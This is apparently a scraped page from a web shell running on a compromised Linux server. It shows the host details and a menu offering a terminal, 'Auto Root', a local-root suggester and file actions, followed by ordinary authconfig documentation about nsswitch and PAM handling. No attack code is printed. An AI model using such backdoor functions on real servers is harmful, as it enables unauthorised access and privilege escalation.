Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 216.73.216.44
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
authconfig-6.2.8 /
Delete
Unzip
Name
Size
Permission
Date
Action
COPYING
17.58
KB
-rw-r--r--
2013-11-01 15:08
NOTES
1.76
KB
-rw-r--r--
2013-11-01 15:08
README.samba3
1.56
KB
-rw-r--r--
2013-11-01 15:08
TODO
1.13
KB
-rw-r--r--
2013-11-01 15:08
Save
Rename
We split naming services from authentication services because they are not the same thing. Any nsswitch module that provides a crypted-password field is enough to make pam_unix work, so nss_ldap + pam_unix can be used for authentication. Problem being that this is not enough (users can't change their passwords with this setup), and you can't assume nss_ldap implies that pam_ldap is the right thing to use, because the network might just as likely be using Kerberos for authentication. Currently, we read and parse the "passwd" entry in /etc/nsswitch.conf to get the client configuration. We always assume that either "files" or "compat" is enabled, and don't preserve order or control flags. Depending on what is enabled, we write out entries in the file, adding modules for a particular service based on a priori knowledge of whether or not a particular module is applicable to the service. Because we control nis, hesiod, ldap, and winbind, we add and remove those always. We preserve "db", "nisplus", and a few other modules if we found them being used, but neither add nor remove them. PAM configuration only touches /etc/pam.d/system-auth. We assume pam_unix first. If enabled, pam_krb5 (or if /afs exists) pam_krb5afs comes next, then pam_ldap, then pam_winbind. For passwords, pam_cracklib goes first. All services use pam_limits*. Not all can use pam_access (which requires that a TTY is set by the calling application). The code is roughly divided into two modules: the back and the fronts. The back is in authinfo.[ch], and the fronts are authconfig.c and authconfig-gtk.py, which needs authconfigmodule.c. They communicate by using the authInfoRead() and authInfoWrite() functions. The rest is gravy, so to speak. * Due to PAM's design, pam_limits can never work perfectly.